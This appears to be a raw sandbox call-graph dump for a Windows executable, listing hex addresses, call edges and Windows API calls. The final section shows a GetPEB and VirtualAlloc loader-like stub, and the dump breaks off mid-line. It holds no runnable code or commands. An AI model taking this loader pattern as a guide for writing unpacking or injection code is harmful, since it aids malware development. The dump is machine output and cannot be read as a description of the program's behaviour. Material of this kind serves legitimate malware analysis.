94533 3bc96d SetCurrentDirectoryW 94530->94533 94634 3f25b5 86 API calls 4 library calls 94531->94634 94537 3cf4ea 48 API calls 94533->94537 94538 423129 94534->94538 94535 3bc8fd 94617 3b46ce SetFilePointerEx SetFilePointerEx 94535->94617 94541 3bc988 94537->94541 94542 423152 94538->94542 94543 423131 94538->94543 94540 42314d 94572 3bcad1 Mailbox 94540->94572 94545 3b47b7 48 API calls 94541->94545 94544 3b4252 84 API calls 94542->94544 94546 3b4252 84 API calls 94543->94546 94547 423157 94544->94547 94576 3bc993 Mailbox __NMSG_WRITE 94545->94576 94546->94531 94548 3cf4ea 48 API calls 94547->94548 94555 423194 94548->94555 94549 3bca9d 94628 3b4907 94549->94628 94553 3b3d98 94553->93463 94553->93472 94554 3bcaa9 SetCurrentDirectoryW 94554->94572 94557 3bba85 48 API calls 94555->94557 94586 4231dd Mailbox 94557->94586 94559 4233ce 94639 3f9b72 48 API calls 94559->94639 94560 423467 94643 3f25b5 86 API calls 4 library calls 94560->94643 94563 423480 94563->94549 94565 4233f0 94640 4129e8 48 API calls ___crtGetEnvironmentStringsW 94565->94640 94567 4233fd 94568 3d1c9d _free 47 API calls 94567->94568 94568->94572 94570 42345f 94642 3f240b 48 API calls 3 library calls 94570->94642 94608 3b48dd 94572->94608 94573 3bce19 48 API calls 94573->94576 94574 3bba85 48 API calls 94574->94586 94576->94549 94576->94560 94576->94570 94576->94573 94621 3bb337 56 API calls _wcscpy 94576->94621 94622 3cc258 GetStringTypeW 94576->94622 94623 3bcb93 59 API calls __wcsnicmp 94576->94623 94624 3bcb5a GetStringTypeW __NMSG_WRITE 94576->94624 94625 3d16d0 GetStringTypeW wcstoxq 94576->94625 94626 3bcc24 162 API calls 3 library calls 94576->94626 94627 3cc682 48 API calls 94576->94627 94580 3bce19 48 API calls 94580->94586 94583 423420 94641 3f25b5 86 API calls 4 library calls 94583->94641 94585 423439 94587 3d1c9d _free 47 API calls 94585->94587 94586->94559 94586->94574 94586->94580 94586->94583 94635 3f2551 48 API calls ___crtGetEnvironmentStringsW 94586->94635 94636 3f2472 60 API calls 2 library calls 94586->94636 94637 3f9c12 48 API calls 94586->94637 94638 3cc682 48 API calls 94586->94638 94588 42344c 94587->94588 94588->94572 94590 3bbb25 94589->94590 94595 3bba98 ___crtGetEnvironmentStringsW 94589->94595 94592 3cf4ea 48 API calls 94590->94592 94591 3cf4ea 48 API calls 94594 3bba9f 94591->94594 94592->94595 94593 3bbac8 94593->94483 94594->94593 94596 3cf4ea 48 API calls 94594->94596 94595->94591 94596->94593 94598 3b4dec 94597->94598 94601 3b4e9a 94597->94601 94599 3cf4ea 48 API calls 94598->94599 94602 3b4e1e 94598->94602 94599->94602 94600 3cf4ea 48 API calls 94600->94602 94601->94483 94602->94600 94602->94601 94603->94468 94604->94483 94605->94483 94606->94483 94607->94477 94609 3b4907 CloseHandle 94608->94609 94610 3b48e5 Mailbox 94609->94610 94611 3b4907 CloseHandle 94610->94611 94612 3b48fc 94611->94612 94612->94553 94613->94507 94614->94510 94615->94520 94616->94535 94617->94516 94644 3d1e46 94618->94644 94621->94576 94622->94576 94623->94576 94624->94576 94625->94576 94626->94576 94627->94576 94629 3b4911 94628->94629 94630 3b4920 94628->94630 94629->94554 94630->94629 94631 3b4925 CloseHandle 94630->94631 94631->94629 94632->94508 94633->94513 94634->94540 94635->94586 94636->94586 94637->94586 94638->94586 94639->94565 94640->94567 94641->94585 94642->94560 94643->94563 94645 3d1e61 94644->94645 94647 3d1e55 94644->94647 94668 3d7c0e 47 API calls __getptd_noexit 94645->94668 94647->94645 94654 3d1ed4 94647->94654 94663 3d9d6b 47 API calls 2 library calls 94647->94663 94648 3d2019 94652 3d1e41 94648->94652 94669 3d6e10 8 API calls __woutput_l 94648->94669 94651 3d1fa0 94651->94645 94651->94652 94655 3d1fb0 94651->94655 94652->94530 94653 3d1f5f 94653->94645 94656 3d1f7b 94653->94656 94665 3d9d6b 47 API calls 2 library calls 94653->94665 94654->94645 94662 3d1f41 94654->94662 94664 3d9d6b 47 API calls 2 library calls 94654->94664 94667 3d9d6b 47 API calls 2 library calls 94655->94667 94656->94645 94656->94652 94659 3d1f91 94656->94659 94666 3d9d6b 47 API calls 2 library calls 94659->94666 94662->94651 94662->94653 94663->94654 94664->94662 94665->94656 94666->94652 94667->94652 94668->94648 94669->94652 94671 3cf4ea 48 API calls 94670->94671 94672 3b6b54 94671->94672 94672->93613 94673->93615 94675 3b4c8b 94674->94675 94676 3b4d94 94674->94676 94675->94676 94677 3cf4ea 48 API calls 94675->94677 94676->93619 94678 3b4cb2 94677->94678 94679 3cf4ea 48 API calls 94678->94679 94680 3b4d22 94679->94680 94680->94676 94683 3b4dd9 48 API calls 94680->94683 94684 3bba85 48 API calls 94680->94684 94687 3bb470 94680->94687 94715 3f9af1 48 API calls 94680->94715 94683->94680 94684->94680 94685->93622 94686->93624 94716 3b6b0f 94687->94716 94689 3bb69b 94690 3bba85 48 API calls 94689->94690 94691 3bb6b5 Mailbox 94690->94691 94691->94680 94694 3bba85 48 API calls 94706 3bb495 94694->94706 94695 42397b 94731 3f26bc 88 API calls 4 library calls 94695->94731 94698 3bb9e4 94732 3f26bc 88 API calls 4 library calls 94698->94732 94699 423973 94699->94691 94702 3bbcce 48 API calls 94702->94706 94703 423989 94704 3bba85 48 API calls 94703->94704 94704->94699 94705 423909 94708 3b6b4a 48 API calls 94705->94708 94706->94689 94706->94694 94706->94695 94706->94698 94706->94702 94706->94705 94711 3bbdfa 48 API calls 94706->94711 94714 423939 ___crtGetEnvironmentStringsW 94706->94714 94721 3bc413 59 API calls 94706->94721 94722 3bbb85 94706->94722 94727 3bbc74 48 API calls 94706->94727 94728 3bc6a5 49 API calls 94706->94728 94729 3bc799 48 API calls ___crtGetEnvironmentStringsW 94706->94729 94710 423914 94708->94710 94713 3cf4ea 48 API calls 94710->94713 94712 3bb66c CharUpperBuffW 94711->94712 94712->94706 94713->94714 94730 3f26bc 88 API calls 4 library calls 94714->94730 94715->94680 94717 3cf4ea 48 API calls 94716->94717 94718 3b6b34 94717->94718 94719 3b6b4a 48 API calls 94718->94719 94720 3b6b43 94719->94720 94720->94706 94721->94706 94723 3bbb9b 94722->94723 94726 3bbb96 ___crtGetEnvironmentStringsW 94722->94726 94724 3cee75 48 API calls 94723->94724 94725 421b77 94723->94725 94724->94726 94725->94725 94726->94706 94727->94706 94728->94706 94729->94706 94730->94699 94731->94703 94732->94699 94734 3b403c LoadImageW 94733->94734 94735 42418d EnumResourceNamesW 94733->94735 94736 3b3ee1 RegisterClassExW 94734->94736 94735->94736 94737 3b3f53 7 API calls 94736->94737 94737->93638 94739 423c33 94738->94739 94740 3b4c44 94738->94740 94739->94740 94741 423c3c DestroyIcon 94739->94741 94740->93644 94764 3f5819 61 API calls _W_store_winword 94740->94764 94741->94740 94743 3b51cb 94742->94743 94763 3b52a2 Mailbox 94742->94763 94744 3b6b0f 48 API calls 94743->94744 94745 3b51d9 94744->94745 94746 423ca1 LoadStringW 94745->94746 94747 3b51e6 94745->94747 94750 423cbb 94746->94750 94748 3b6a63 48 API calls 94747->94748 94749 3b51fb 94748->94749 94749->94750 94751 3b520c 94749->94751 94752 3b510d 48 API calls 94750->94752 94753 3b52a7 94751->94753 94754 3b5216 94751->94754 94757 423cc5 94752->94757 94755 3b6eed 48 API calls 94753->94755 94756 3b510d 48 API calls 94754->94756 94760 3b5220 _memset _wcscpy 94755->94760 94756->94760 94758 3b518c 48 API calls 94757->94758 94757->94760 94759 423ce7 94758->94759 94762 3b518c 48 API calls 94759->94762 94761 3b5288 Shell_NotifyIconW 94760->94761 94761->94763 94762->94760 94763->93649 94764->93644 94766 3bf130 94765->94766 94768 3bfe30 331 API calls 94766->94768 94773 3bf199 94766->94773 94767 3bf595 94774 3bf431 Mailbox 94767->94774 94776 3bd7f7 48 API calls 94767->94776 94770 428728 94768->94770 94769 4287c8 94895 3fcc5c 86 API calls 4 library calls 94769->94895 94770->94773 94892 3fcc5c 86 API calls 4 library calls 94770->94892 94771 3bf418 94771->94774 94781 428b1b 94771->94781 94811 3bf6aa 94771->94811 94773->94767 94777 3bd7f7 48 API calls 94773->94777 94814 3bf229 94773->94814 94818 3bf3dd 94773->94818 94783 3fcc5c 86 API calls 94774->94783 94787 3bf537 Mailbox 94774->94787 94788 3bd6e9 55 API calls 94774->94788 94789 428b7e 94774->94789 94791 428c53 94774->94791 94794 428beb 94774->94794 94796 3bfe30 331 API calls 94774->94796 94803 3bfce0 94774->94803 94808 3c1b90 48 API calls 94774->94808 94891 3bdd47 48 API calls ___crtGetEnvironmentStringsW 94774->94891 94903 3e97ed InterlockedDecrement 94774->94903 94911 3cc1af 48 API calls 94774->94911 94778 4287a3 94776->94778 94782 428772 94777->94782 94894 3d0f0a 52 API calls __cinit 94778->94894 94780 3bf3f2 94780->94771 94896 3f9af1 48 API calls 94780->94896 94801 428bcf 94781->94801 94802 428b2c 94781->94802 94893 3d0f0a 52 API calls __cinit 94782->94893 94783->94774 94785 3bf770 94790 428a45 94785->94790 94804 3bf77a 94785->94804 94787->93709 94788->94774 94905 40e40a 331 API calls Mailbox 94789->94905 94902 3cc1af 48 API calls 94790->94902 94910 3fcc5c 86 API calls 4 library calls 94791->94910 94792 428810 94897 40eef8 331 API calls 94792->94897 94793 3bfe30 331 API calls 94793->94811 94908 40bdbd 331 API calls Mailbox 94794->94908 94796->94774 94907 3fcc5c 86 API calls 4 library calls 94801->94907 94904 40f5ee 331 API calls 94802->94904 94803->94787 94906 3fcc5c 86 API calls 4 library calls 94803->94906 94806 3c1b90 48 API calls 94804->94806 94806->94774 94808->94774 94810 428c00 94810->94787 94909 3fcc5c 86 API calls 4 library calls 94810->94909 94811->94774 94811->94785 94811->94787 94811->94793 94811->94803 94813 428823 94813->94771 94817 42884b 94813->94817 94814->94767 94814->94771 94814->94774 94814->94818 94898 40ccdc 48 API calls 94817->94898 94818->94769 94818->94774 94818->94780 94820 428857 94822 4288aa 94820->94822 94823 428865 94820->94823 94827 4288a0 Mailbox 94822->94827 94900 3fa69d 48 API calls 94822->94900 94899 3f9b72 48 API calls 94823->94899 94824 3bfe30 331 API calls 94824->94787 94827->94824 94828 4288e7 94901 3bbc74 48 API calls 94828->94901 94831 3c479f 94830->94831 94832 3c4637 94830->94832 94833 3bce19 48 API calls 94831->94833 94834 426e05 94832->94834 94835 3c4643 94832->94835 94842 3c46e4 Mailbox 94833->94842 94980 40e822 331 API calls Mailbox 94834->94980 94912 3c4300 94835->94912 94838 3c4739 Mailbox 94838->93709 94839 426e11 94839->94838 94981 3fcc5c 86 API calls 4 library calls 94839->94981 94841 3c4659 94841->94838 94841->94839 94841->94842 94927 3ffa0c 94842->94927 94968 406ff0 94842->94968 94977 3f6524 94842->94977 94846->93709 94847->93709 94848->93709 94849->93709 94850->93709 94851->93663 94852->93656 94853->93661 94854->93709 94855->93709 94856->93704 94857->93704 94858->93704 94860 3bfe50 94859->94860 94884 3bfe7e 94859->94884 94861 3cf4ea 48 API calls 94860->94861 94861->94884 94862 3d0f0a 52 API calls __cinit 94862->94884 94863 3c146e 94864 3b6eed 48 API calls 94863->94864 94886 3bffe1 94864->94886 94865 3e97ed InterlockedDecrement 94865->94884 94866 3bd7f7 48 API calls 94866->94884 94868 3c0509 95126 3fcc5c 86 API calls 4 library calls 94868->95126 94870 3cf4ea 48 API calls 94870->94884 94872 42a922 94872->93709 94873 42a246 94878 3b6eed 48 API calls 94873->94878 94874 3c1473 95125 3fcc5c 86 API calls 4 library calls 94874->95125 94877 3b6eed 48 API calls 94877->94884 94878->94886 94879 42a873 94879->93709 94880 42a30e 94880->94886 95123 3e97ed InterlockedDecrement 94880->95123 94882 42a973 95127 3fcc5c 86 API calls 4 library calls 94882->95127 94884->94862 94884->94863 94884->94865 94884->94866 94884->94868 94884->94870 94884->94873 94884->94874 94884->94877 94884->94880 94884->94882 94884->94886 94887 3c15b5 94884->94887 95108 3c1d10 94884->95108 95122 3c1820 331 API calls 2 library calls 94884->95122 94885 42a982 94886->93709 95124 3fcc5c 86 API calls 4 library calls 94887->95124 94888->93704 94889->93704 94890->93704 94891->94774 94892->94773 94893->94814 94894->94774 94895->94787 94896->94792 94897->94813 94898->94820 94899->94827 94900->94828 94901->94827 94902->94774 94903->94774 94904->94774 94905->94803 94906->94787 94907->94787 94908->94810 94909->94787 94910->94787 94911->94774 94913 426e60 94912->94913 94916 3c432c 94912->94916 94983 3fcc5c 86 API calls 4 library calls 94913->94983 94915 426e71 94984 3fcc5c 86 API calls 4 library calls 94915->94984 94916->94915 94924 3c4366 ___crtGetEnvironmentStringsW 94916->94924 94918 3c4435 94923 3c4445 94918->94923 94982 40cda2 82 API calls Mailbox 94918->94982 94920 3c44b1 94920->94841 94921 3cf4ea 48 API calls 94921->94924 94922 3bfe30 331 API calls 94922->94924 94923->94841 94924->94918 94924->94921 94924->94922 94924->94923 94925 426ebd 94924->94925 94985 3fcc5c 86 API calls 4 library calls 94925->94985 94928 3ffa1c __ftell_nolock 94927->94928 94930 3ffa44 94928->94930 95062 3bd286 48 API calls 94928->95062 94986 3b936c 94930->94986 94932 3ffa5e 94933 3ffb92 94932->94933 94934 3ffb68 94932->94934 94935 3ffa80 94932->94935 94933->94838 94936 3b41a9 136 API calls 94934->94936 94937 3b936c 81 API calls 94935->94937 94938 3ffb79 94936->94938 94942 3ffa8c _wcscpy _wcschr 94937->94942 94939 3ffb8e 94938->94939 94940 3b41a9 136 API calls 94938->94940 94939->94933 94941 3b936c 81 API calls 94939->94941 94940->94939 94943 3ffbc7 94941->94943 94947 3ffab0 _wcscat _wcscpy 94942->94947 94951 3ffade _wcscat 94942->94951 94944 3d1dfc __wsplitpath 47 API calls 94943->94944 94952 3ffbeb _wcscat _wcscpy 94944->94952 94945 3b936c 81 API calls 94946 3ffafc _wcscpy 94945->94946 95063 3f72cb GetFileAttributesW 94946->95063 94949 3b936c 81 API calls 94947->94949 94949->94951 94950 3ffb1c __NMSG_WRITE 94950->94933 94953 3b936c 81 API calls 94950->94953 94951->94945 94955 3b936c 81 API calls 94952->94955 94954 3ffb48 94953->94954 95064 3f60dd 77 API calls 4 library calls 94954->95064 94957 3ffc82 94955->94957 95006 3f690b 94957->95006 94958 3ffb5c 94958->94933 94960 3ffca2 94961 3f6524 3 API calls 94960->94961 94962 3ffcb1 94961->94962 94963 3b936c 81 API calls 94962->94963 94965 3ffce2 94962->94965 94964 3ffccb 94963->94964 95012 3fbfa4 94964->95012 94967 3b4252 84 API calls 94965->94967 94967->94933 94969 3b936c 81 API calls 94968->94969 94970 40702a 94969->94970 94971 3bb470 91 API calls 94970->94971 94972 40703a 94971->94972 94973 40705f 94972->94973 94974 3bfe30 331 API calls 94972->94974 94976 407063 94973->94976 95103 3bcdb9 48 API calls 94973->95103 94974->94973 94976->94838 95104 3f6ca9 GetFileAttributesW 94977->95104 94980->94839 94981->94838 94982->94920 94983->94915 94984->94923 94985->94923 94987 3b9384 94986->94987 95004 3b9380 94986->95004 94988 424cbd __i64tow 94987->94988 94989 3b9398 94987->94989 94990 424bbf 94987->94990 95000 3b93b0 __itow Mailbox _wcscpy 94987->95000 95065 3d172b 80 API calls 3 library calls 94989->95065 94992 424ca5 94990->94992 94995 424bc8 94990->94995 95066 3d172b 80 API calls 3 library calls 94992->95066 94993 3cf4ea 48 API calls 94996 3b93ba 94993->94996 94997 424be7 94995->94997 94995->95000 94999 3bce19 48 API calls 94996->94999 94996->95004 94998 3cf4ea 48 API calls 94997->94998 95001 424c04 94998->95001 94999->95004 95000->94993 95002 3cf4ea 48 API calls 95001->95002 95003 424c2a 95002->95003 95003->95004 95005 3bce19 48 API calls 95003->95005 95004->94932 95005->95004 95007 3f6918 _wcschr __ftell_nolock 95006->95007 95008 3f692e _wcscat _wcscpy 95007->95008 95009 3d1dfc __wsplitpath 47 API calls 95007->95009 95008->94960 95010 3f695d 95009->95010 95011 3d1dfc __wsplitpath 47 API calls 95010->95011 95011->95008 95013 3fbfb1 __ftell_nolock 95012->95013 95014 3cf4ea 48 API calls 95013->95014 95015 3fc00e 95014->95015 95016 3b47b7 48 API calls 95015->95016 95017 3fc018 95016->95017 95018 3fbdb4 GetSystemTimeAsFileTime 95017->95018 95019 3fc023 95018->95019 95020 3b4517 83 API calls 95019->95020 95021 3fc036 _wcscmp 95020->95021 95022 3fc05a 95021->95022 95023 3fc107 95021->95023 95024 3fc56d 94 API calls 95022->95024 95025 3fc56d 94 API calls 95023->95025 95026 3fc05f 95024->95026 95040 3fc0d3 _wcscat 95025->95040 95027 3d1dfc __wsplitpath 47 API calls 95026->95027 95031 3fc110 95026->95031 95032 3fc088 _wcscat _wcscpy 95027->95032 95028 3b44ed 64 API calls 95029 3fc12c 95028->95029 95030 3b44ed 64 API calls 95029->95030 95033 3fc13c 95030->95033 95031->94965 95035 3d1dfc __wsplitpath 47 API calls 95032->95035 95034 3b44ed 64 API calls 95033->95034 95036 3fc157 95034->95036 95035->95040 95037 3b44ed 64 API calls 95036->95037 95038 3fc167 95037->95038 95039 3b44ed 64 API calls 95038->95039 95041 3fc182 95039->95041 95040->95028 95040->95031 95042 3b44ed 64 API calls 95041->95042 95043 3fc192 95042->95043 95044 3b44ed 64 API calls 95043->95044 95045 3fc1a2 95044->95045 95046 3b44ed 64 API calls 95045->95046 95047 3fc1b2 95046->95047 95067 3fc71a GetTempPathW GetTempFileNameW 95047->95067 95049 3fc1be 95050 3d3499 117 API calls 95049->95050 95052 3fc1cf 95050->95052 95051 3d35e4 __fcloseall 83 API calls 95053 3fc294 95051->95053 95052->95031 95054 3b44ed 64 API calls 95052->95054 95061 3fc289 95052->95061 95068 3d2aae 95052->95068 95053->95031 95055 3fc2b8 95053->95055 95056 3fc342 CopyFileW 95053->95056 95054->95052 95084 3fb965 118 API calls __fcloseall 95055->95084 95056->95031 95057 3fc32d 95056->95057 95057->95031 95081 3fc6d9 CreateFileW 95057->95081 95061->95051 95062->94930 95063->94950 95064->94958 95065->95000 95066->95000 95067->95049 95069 3d2aba __mtinitlocknum 95068->95069 95070 3d2aec 95069->95070 95071 3d2ad4 95069->95071 95072 3d2ae4 __mtinitlocknum 95069->95072 95073 3d4e1c __lock_file 48 API calls 95070->95073 95097 3d7c0e 47 API calls __getptd_noexit 95071->95097 95072->95052 95075 3d2af2 95073->95075 95085 3d2957 95075->95085 95076 3d2ad9 95098 3d6e10 8 API calls __woutput_l 95076->95098 95082 3fc6ff SetFileTime CloseHandle 95081->95082 95083 3fc715 95081->95083 95082->95083 95083->95031 95084->95057 95087 3d2966 95085->95087 95092 3d2984 95085->95092 95086 3d2974 95100 3d7c0e 47 API calls __getptd_noexit 95086->95100 95087->95086 95087->95092 95094 3d299c ___crtGetEnvironmentStringsW 95087->95094 95089 3d2979 95101 3d6e10 8 API calls __woutput_l 95089->95101 95099 3d2b24 LeaveCriticalSection LeaveCriticalSection _fseek 95092->95099 95093 3d2c84 __flush 78 API calls 95093->95094 95094->95092 95094->95093 95095 3d2933 __flswbuf 47 API calls 95094->95095 95096 3daf61 __flswbuf 78 API calls 95094->95096 95102 3d8e63 78 API calls 4 library calls 95094->95102 95095->95094 95096->95094 95097->95076 95098->95072 95099->95072 95100->95089 95101->95092 95102->95094 95103->94976 95105 3f6cc4 FindFirstFileW 95104->95105 95107 3f6529 95104->95107 95106 3f6cd9 FindClose 95105->95106 95105->95107 95106->95107 95107->94838 95109 3c1d2a 95108->95109 95111 3c1ed6 95108->95111 95110 3c2357 95109->95110 95109->95111 95112 3c1e0b 95109->95112 95113 3c1eba 95109->95113 95110->95113 95131 3f9f44 58 API calls wcstoxq 95110->95131 95111->95110 95111->95113 95117 3c1e9a Mailbox 95111->95117 95118 3c1f55 95111->95118 95112->95113 95115 3c1e47 95112->95115 95112->95118 95113->94884 95115->95113 95115->95117 95121 42bfc4 95115->95121 95117->95113 95130 3d203b 58 API calls __wtof_l 95117->95130 95118->95113 95118->95117 95129 3e97ed InterlockedDecrement 95118->95129 95128 3d203b 58 API calls __wtof_l 95121->95128 95122->94884 95123->94886 95124->94886 95125->94879 95126->94872 95127->94885 95128->95113 95129->95117 95130->95113 95131->95113 95133 3b513f __NMSG_WRITE 95132->95133 95134 421b27 95133->95134 95135 3b5151 95133->95135 95136 3b6b4a 48 API calls 95134->95136 95137 3bbb85 48 API calls 95135->95137 95138 421b34 95136->95138 95139 3b515e ___crtGetEnvironmentStringsW 95137->95139 95140 3cee75 48 API calls 95138->95140 95139->93733 95141 421b57 ___crtGetEnvironmentStringsW 95140->95141 95143 3bb392 95142->95143 95150 3bb3c5 ___crtGetEnvironmentStringsW 95142->95150 95144 3bb3b8 95143->95144 95145 3bb3fd 95143->95145 95143->95150 95146 3bbb85 48 API calls 95144->95146 95147 3cf4ea 48 API calls 95145->95147 95146->95150 95148 3bb407 95147->95148 95149 3cf4ea 48 API calls 95148->95149 95149->95150 95150->93742 95151->93743 95152 3c221a 95153 3c271e 95152->95153 95154 3c2223 95152->95154 95162 3c1eba Mailbox 95153->95162 95163 3ea58f 48 API calls ___crtGetEnvironmentStringsW 95153->95163 95154->95153 95155 3b936c 81 API calls 95154->95155 95156 3c224e 95155->95156 95156->95153 95158 3c225e 95156->95158 95160 3bb384 48 API calls 95158->95160 95159 42be8a 95161 3b6eed 48 API calls 95159->95161 95160->95162 95161->95162 95163->95159 95164 4219ba 95169 3cc75a 95164->95169 95168 4219c9 95170 3bd7f7 48 API calls 95169->95170 95171 3cc7c8 95170->95171 95177 3cd26c 95171->95177 95174 3cc865 95175 3cc881 95174->95175 95180 3cd1fa 48 API calls ___crtGetEnvironmentStringsW 95174->95180 95176 3d0f0a 52 API calls __cinit 95175->95176 95176->95168 95181 3cd298 95177->95181 95180->95174 95182 3cd2a5 95181->95182 95183 3cd28b 95181->95183 95182->95183 95184 3cd2ac RegOpenKeyExW 95182->95184 95183->95174 95184->95183 95185 3cd2c6 RegQueryValueExW 95184->95185 95186 3cd2fc RegCloseKey 95185->95186 95187 3cd2e7 95185->95187 95186->95183 95187->95186 95188 42197b 95193 3cdd94 95188->95193 95192 42198a 95194 3cf4ea 48 API calls 95193->95194 95195 3cdd9c 95194->95195 95196 3cddb0 95195->95196 95201 3cdf3d 95195->95201 95200 3d0f0a 52 API calls __cinit 95196->95200 95200->95192 95202 3cdda8 95201->95202 95203 3cdf46 95201->95203 95205 3cddc0 95202->95205 95233 3d0f0a 52 API calls __cinit 95203->95233 95206 3bd7f7 48 API calls 95205->95206 95207 3cddd7 GetVersionExW 95206->95207 95208 3b6a63 48 API calls 95207->95208 95209 3cde1a 95208->95209 95234 3cdfb4 95209->95234 95212 3b6571 48 API calls 95214 3cde2e 95212->95214 95213 4224c8 95214->95213 95238 3cdf77 95214->95238 95217 3cdea4 GetCurrentProcess 95247 3cdf5f LoadLibraryA GetProcAddress 95217->95247 95218 3cdebb 95220 3cdf31 GetSystemInfo 95218->95220 95221 3cdee3 95218->95221 95222 3cdf0e 95220->95222 95241 3ce00c 95221->95241 95224 3cdf1c FreeLibrary 95222->95224 95225 3cdf21 95222->95225 95224->95225 95225->95196 95227 3cdf29 GetSystemInfo 95229 3cdf03 95227->95229 95228 3cdef9 95244 3cdff4 95228->95244 95229->95222 95232 3cdf09 FreeLibrary 95229->95232 95232->95222 95233->95202 95235 3cdfbd 95234->95235 95236 3bb18b 48 API calls 95235->95236 95237 3cde22 95236->95237 95237->95212 95248 3cdf89 95238->95248 95252 3ce01e 95241->95252 95245 3ce00c 2 API calls 95244->95245 95246 3cdf01 GetNativeSystemInfo 95245->95246 95246->95229 95247->95218 95249 3cdea0 95248->95249 95250 3cdf92 LoadLibraryA 95248->95250 95249->95217 95249->95218 95250->95249 95251 3cdfa3 GetProcAddress 95250->95251 95251->95249 95253 3cdef1 95252->95253 95254 3ce027 LoadLibraryA 95252->95254 95253->95227 95253->95228 95254->95253 95255 3ce038 GetProcAddress 95254->95255 95255->95253 95256 3b3742 95257 3b374b 95256->95257 95258 3b3769 95257->95258 95259 3b37c8 95257->95259 95296 3b37c6 95257->95296 95263 3b382c PostQuitMessage 95258->95263 95264 3b3776 95258->95264 95261 421e00 95259->95261 95262 3b37ce 95259->95262 95260 3b37ab DefWindowProcW 95298 3b37b9 95260->95298 95305 3b2ff6 16 API calls 95261->95305 95265 3b37d3 95262->95265 95266 3b37f6 SetTimer RegisterWindowMessageW 95262->95266 95263->95298 95268 421e88 95264->95268 95269 3b3781 95264->95269 95270 421da3 95265->95270 95271 3b37da KillTimer 95265->95271 95273 3b381f CreatePopupMenu 95266->95273 95266->95298 95310 3f4ddd 60 API calls _memset 95268->95310 95274 3b3789 95269->95274 95275 3b3836 95269->95275 95277 421da8 95270->95277 95278 421ddc MoveWindow 95270->95278 95301 3b3847 Shell_NotifyIconW _memset 95271->95301 95272 421e27 95306 3ce312 331 API calls Mailbox 95272->95306 95273->95298 95281 421e6d 95274->95281 95282 3b3794 95274->95282 95303 3ceb83 53 API calls _memset 95275->95303 95285 421dcb SetFocus 95277->95285 95286 421dac 95277->95286 95278->95298 95281->95260 95309 3ea5f3 48 API calls 95281->95309 95288 421e58 95282->95288 95293 3b379f 95282->95293 95283 421e9a 95283->95260 95283->95298 95285->95298 95289 421db5 95286->95289 95286->95293 95287 3b37ed 95302 3b390f DeleteObject DestroyWindow Mailbox 95287->95302 95308 3f55bd 70 API calls _memset 95288->95308 95304 3b2ff6 16 API calls 95289->95304 95293->95260 95307 3b3847 Shell_NotifyIconW _memset 95293->95307 95295 3b3845 95295->95298 95296->95260 95299 421e4c 95300 3b4ffc 67 API calls 95299->95300 95300->95296 95301->95287 95302->95298 95303->95295 95304->95298 95305->95272 95306->95293 95307->95299 95308->95295 95309->95296 95310->95283 95311 4219cb 95316 3b2322 95311->95316 95313 4219d1 95349 3d0f0a 52 API calls __cinit 95313->95349 95315 4219db 95317 3b2344 95316->95317 95350 3b26df 95317->95350 95322 3bd7f7 48 API calls 95323 3b2384 95322->95323 95324 3bd7f7 48 API calls 95323->95324 95325 3b238e 95324->95325 95326 3bd7f7 48 API calls 95325->95326 95327 3b2398 95326->95327 95328 3bd7f7 48 API calls 95327->95328 95329 3b23de 95328->95329 95330 3bd7f7 48 API calls 95329->95330 95331 3b24c1 95330->95331 95358 3b263f 95331->95358 95335 3b24f1 95336 3bd7f7 48 API calls 95335->95336 95337 3b24fb 95336->95337 95387 3b2745 95337->95387 95339 3b2546 95340 3b2556 GetStdHandle 95339->95340 95341 3b25b1 95340->95341 95342 42501d 95340->95342 95343 3b25b7 CoInitialize 95341->95343 95342->95341 95344 425026 95342->95344 95343->95313 95394 3f92d4 53 API calls 95344->95394 95346 42502d 95395 3f99f9 CreateThread 95346->95395 95348 425039 CloseHandle 95348->95343 95349->95315 95396 3b2854 95350->95396 95353 3b6a63 48 API calls 95354 3b234a 95353->95354 95355 3b272e 95354->95355 95410 3b27ec 6 API calls 95355->95410 95357 3b237a 95357->95322 95359 3bd7f7 48 API calls 95358->95359 95360 3b264f 95359->95360 95361 3bd7f7 48 API calls 95360->95361 95362 3b2657 95361->95362 95411 3b26a7 95362->95411 95365 3b26a7 48 API calls 95366 3b2667 95365->95366 95367 3bd7f7 48 API calls 95366->95367 95368 3b2672 95367->95368 95369 3cf4ea 48 API calls 95368->95369 95370 3b24cb 95369->95370 95371 3b22a4 95370->95371 95372 3b22b2 95371->95372 95373 3bd7f7 48 API calls 95372->95373 95374 3b22bd 95373->95374 95375 3bd7f7 48 API calls 95374->95375 95376 3b22c8 95375->95376 95377 3bd7f7 48 API calls 95376->95377 95378 3b22d3 95377->95378 95379 3bd7f7 48 API calls 95378->95379 95380 3b22de 95379->95380 95381 3b26a7 48 API calls 95380->95381 95382 3b22e9 95381->95382 95383 3cf4ea 48 API calls 95382->95383 95384 3b22f0 95383->95384 95385 3b22f9 RegisterWindowMessageW 95384->95385 95386 421fe7 95384->95386 95385->95335 95388 3b2755 95387->95388 95389 425f4d 95387->95389 95391 3cf4ea 48 API calls 95388->95391 95416 3fc942 50 API calls 95389->95416 95393 3b275d 95391->95393 95392 425f58 95393->95339 95394->95346 95395->95348 95417 3f99df 54 API calls 95395->95417 95403 3b2870 95396->95403 95399 3b2870 48 API calls 95400 3b2864 95399->95400 95401 3bd7f7 48 API calls 95400->95401 95402 3b2716 95401->95402 95402->95353 95404 3bd7f7 48 API calls 95403->95404 95405 3b287b 95404->95405 95406 3bd7f7 48 API calls 95405->95406 95407 3b2883 95406->95407 95408 3bd7f7 48 API calls 95407->95408 95409 3b285c 95408->95409 95409->95399 95410->95357 95412 3bd7f7 48 API calls 95411->95412 95413 3b26b0 95412->95413 95414 3bd7f7 48 API calls 95413->95414 95415 3b265f 95414->95415 95415->95365 95416->95392 95418 428eb8 95422 3fa635 95418->95422 95420 428ec3 95421 3fa635 84 API calls 95420->95421 95421->95420 95423 3fa66f 95422->95423 95427 3fa642 95422->95427 95423->95420 95424 3fa671 95434 3cec4e 81 API calls 95424->95434 95425 3fa676 95428 3b936c 81 API calls 95425->95428 95427->95423 95427->95424 95427->95425 95431 3fa669 95427->95431 95429 3fa67d 95428->95429 95430 3b510d 48 API calls 95429->95430 95430->95423 95433 3c4525 61 API calls ___crtGetEnvironmentStringsW 95431->95433 95433->95423 95434->95425 95435 1009e4b 95436 1009e60 95435->95436 95437 10074f0 GetPEB 95436->95437 95438 1009e6c 95437->95438 95439 1009f20 95438->95439 95440 1009e8a 95438->95440 95457 100a7d0 9 API calls 95439->95457 95444 1009b30 95440->95444 95443 1009f07 95445 10074f0 GetPEB 95444->95445 95446 1009bcf 95445->95446 95449 1009c29 VirtualAlloc 95446->95449 95454 1009c0d 95446->95454 95455 1009d30 CloseHandle 